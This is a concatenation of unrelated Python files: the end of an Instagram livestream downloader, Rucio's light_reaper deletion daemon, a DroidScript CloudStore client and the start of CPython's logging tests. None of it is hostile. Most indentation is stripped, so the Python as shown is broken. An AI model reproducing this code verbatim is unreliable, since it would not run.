logger.error('Unexpected Error: %s' % str(e))
continue # Done with all replay processing
# ------------- LIVE broadcast -------------
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
job_aborted = False
        # Callback used by the downloader to check whether the broadcast is still alive
def check_status():
heartbeat_info = api.broadcast_heartbeat_and_viewercount(broadcast['id'])
logger.info('Broadcast Status Check: %s' % heartbeat_info['broadcast_status'])
return heartbeat_info['broadcast_status'] not in ['active', 'interrupted']
dl = Downloader(
mpd=mpd_url,
output_dir=mpd_output_dir,
callback_check=check_status,
user_agent=api.user_agent,
mpd_download_timeout=userconfig.mpdtimeout,
download_timeout=userconfig.downloadtimeout,
duplicate_etag_retry=60,
ffmpegbinary=userconfig.ffmpegbinary)
        # Generate the final output filename upfront so the comments thread can derive the matching .srt path
final_output = generate_safe_path('%s.mp4' % filename_prefix, userconfig.outputdir)
# Call the api to collect comments for the stream
def get_comments():
logger.info('Collecting comments...')
cdl = CommentsDownloader(
api=api, broadcast=broadcast, destination_file=comments_json_file,
user_config=userconfig, logger=logger)
first_comment_created_at = 0
try:
while not job_aborted:
# Set initial_buffered_duration as soon as it's available
if 'initial_buffered_duration' not in broadcast and dl.initial_buffered_duration:
broadcast['initial_buffered_duration'] = dl.initial_buffered_duration
cdl.broadcast = broadcast
first_comment_created_at = cdl.get_live(first_comment_created_at)
except ClientError as e:
if 'media has been deleted' in e.error_response:
logger.info('Stream end detected.')
else:
logger.error('Comment collection ClientError: %d %s' % (e.code, e.error_response))
logger.info('%d comments collected' % len(cdl.comments))
# do final save just in case
if cdl.comments:
cdl.save()
# Generate srt from comments collected
srt_filename = final_output.replace('.mp4', '.srt')
CommentsDownloader.generate_srt(
cdl.comments, download_start_time, srt_filename,
comments_delay=dl.initial_buffered_duration)
logger.info('Comments written to: %s' % srt_filename)
# Put comments collection into its own thread to run concurrently
comment_thread_worker = None
if userconfig.commenters or userconfig.collectcomments:
comment_thread_worker = threading.Thread(target=get_comments)
comment_thread_worker.start()
logger.info('Downloading into %s ...' % mpd_output_dir)
logger.info('[i] To interrupt the download, press CTRL+C')
try:
dl.run()
except KeyboardInterrupt:
logger.warning('Download interrupted.')
# Wait for download threads to complete
if not dl.is_aborted:
dl.stop()
finally:
job_aborted = True
# Record the initial_buffered_duration
broadcast['initial_buffered_duration'] = dl.initial_buffered_duration
broadcast['segments'] = dl.segment_meta
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
missing = broadcast['delay'] - int(dl.initial_buffered_duration)
logger.info('Recorded stream is missing %d seconds' % missing)
# Wait for comments thread to complete
if comment_thread_worker and comment_thread_worker.is_alive():
logger.info('Stopping comments download...')
comment_thread_worker.join()
logger.info('Assembling files....')
generated_files = dl.stitch(
final_output, skipffmpeg=userconfig.skipffmpeg,
cleartempfiles=(not userconfig.nocleanup))
logger.info(rule_line)
if not userconfig.skipffmpeg:
logger.info('Generated file(s): \n%s' % '\n'.join(generated_files))
else:
logger.info('Skipped generating file.')
logger.info(rule_line)
if not userconfig.skipffmpeg and not userconfig.nocleanup:
shutil.rmtree(mpd_output_dir, ignore_errors=True)
if userconfig.openwhendone and os.path.exists(final_output):
webbrowser.open_new_tab('file://' + os.path.abspath(final_output))
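# A sketch of a livestream_dl.cfg that the SafeConfigParser block near the top
# of run() would pick up (values are illustrative; option names mirror the
# argparse destinations / default_config keys above):
#
#   [livestream_dl]
#   username = my_ig_login
#   outputdir = downloaded
#   collectcomments = true
#   filenameformat = {year}{month}{day}_{username}_{broadcastid}_{broadcasttype}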
|
light_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019
#
# PY3K COMPATIBLE
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=1, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
    hash_executable = hashlib.sha256((sys.argv[0] + ''.join(rses)).encode()).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
replicas = list_expired_temporary_dids(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse_id=rse_id)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
try:
# pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
# lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
# operation='delete', scheme=scheme).values()[0])
pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
# logging.debug('Light Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Light Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Light Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Light Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_temporary_dids(dids=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Light Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
    :param once: If True, only runs one iteration of the main loop.
    :param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
    :param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
    :param exclude_rses: RSE expression to exclude RSEs from the Reaper.
    :param include_rses: RSE expression to include RSEs.
    :param delay_seconds: Accepted for interface compatibility; not used by this light reaper.
    :param all_rses: If True, run against every RSE returned by rse_core.list_rses().
    """
logging.info('main: starting processes')
if all_rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
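# The module only defines run()/stop() and no entry point, so a launcher has to
# wire them together (Rucio normally does this via its own bin scripts). A
# minimal, illustrative sketch of such a launcher:
if __name__ == '__main__':
    import signal

    # Translate SIGTERM/SIGINT into a graceful stop via the GRACEFUL_STOP event.
    signal.signal(signal.SIGTERM, stop)
    signal.signal(signal.SIGINT, stop)
    run(total_workers=1, chunk_size=100, once=False, all_rses=True)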
|
cloudstore.py
|
import requests
import threading
import time
import json
# initiates a parallel delayed function call
def setTimeout(cb, delay, args=None, kwargs=None):
t = threading.Timer(delay, cb, args, kwargs)
t.start()
return t
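# Example (illustrative): setTimeout(lambda: print("tick"), 2.5) fires the
# lambda on a Timer thread after roughly 2.5 seconds; the returned Timer can
# be cancel()led before it fires.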
class CloudStore:
# static to limit across instances
maxRate = 3 # minimum delay in seconds between requests
__tlast = 0 # last request timestamp
rateOff = 0.01 # minimum offset in seconds between requests
lock = threading.Lock() # main thread lock for synchronizing
def __init__(self, key, server="https://droidscript.cloud/cloudstore"):
self.server = server # host server url
self.m_apiKey = key # private api key
self.m_retry = True # (unused boolean) for retrying failed requests
self.m_version = 1 # library version
@classmethod
def rateCheck(self):
res = True
self.lock.acquire()
n = time.time()
if n - self.__tlast < self.maxRate: res = False
else: self.__tlast = n
self.lock.release()
return res
@classmethod
def getRemainingRate(self):
self.lock.acquire()
res = self.maxRate - (time.time() - self.__tlast)
self.lock.release()
return res
@classmethod
def sendData(self, url, json=None, cb=None, method="POST", **kwargs):
t = threading.Thread(target=self.__asyncSendData, args=[url, json, cb, method], kwargs=kwargs)
t.start()
return t
@classmethod
def __asyncSendData(self, url, data=None, cb=None, method="POST", **kwargs):
while not self.rateCheck():
time.sleep(self.getRemainingRate() + self.rateOff)
r = res = None
try:
r = requests.request(method, url, json=data, **kwargs)
if r.status_code == 200: res = r.json()
else: res = { "error": "Http error", "message": r.reason, "exception": requests.HTTPError(response=r) }
except json.JSONDecodeError as e:
res = { "error": "Error parsing data", "message": e.__doc__, "exception": e }
except Exception as e:
res = { "error": "Error sending data", "message": e.__doc__, "exception": e }
if cb and res:
res["response"] = r
self.lock.acquire()
cb(res)
self.lock.release()
def save(self, file, obj, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": None, "id": "_data", "value": obj, "password": password }
self.sendData(self.server + "/store/save", data, callback)
def merge(self, file, obj, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "merge", "id": "_data", "value": obj, "password": password }
self.sendData(self.server + "/store/save", data, callback)
def delete(self, file, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "delete", "id": "_data", "password": password }
self.sendData(self.server + "/store/save", data, callback)
def load(self, file, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": None, "id": "_data", "password": password }
self.sendData(self.server + "/store/load", data, callback)
def list(self, file="", callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "list", "id": "_data", "password": password }
self.sendData(self.server + "/store/load", data, callback)
def upload(self, data, name, mimetype, callback=None, password=None):
data = { "key": self.m_apiKey, "password": password }
self.sendData(self.server + "/upload-2", None, callback, data=data, files=[("file", (name, data, mimetype))])
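# A usage sketch (assumptions: "my_api_key" is a valid CloudStore key and the
# default server is reachable; all names/values are illustrative). Every call
# is asynchronous: the request runs on its own thread and the callback gets
# the decoded JSON reply (or an error dict) once the rate limiter allows it.
if __name__ == "__main__":
    def on_result(result):
        # result carries either the server's JSON reply or an "error" entry,
        # plus the raw requests.Response under "response".
        print(result.get("error") or result)

    store = CloudStore("my_api_key")
    store.save("settings", {"volume": 0.8, "theme": "dark"}, on_result)
    store.load("settings", on_result)
    # The worker threads are non-daemon, so the script waits for both replies.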
|
test_logging.py
|
# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import select
import socket
import struct
import sys
import tempfile
from test.support import (captured_stdout, run_with_locale, run_unittest,
patch, requires_zlib, TestHandler, Matcher)
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asynchat
import asyncore
import errno
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except socket.error: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
old_stderr = sys.stderr
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertIn('\nRuntimeError: deliberate mistake\n',
sio.getvalue())
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
h.handle(r)
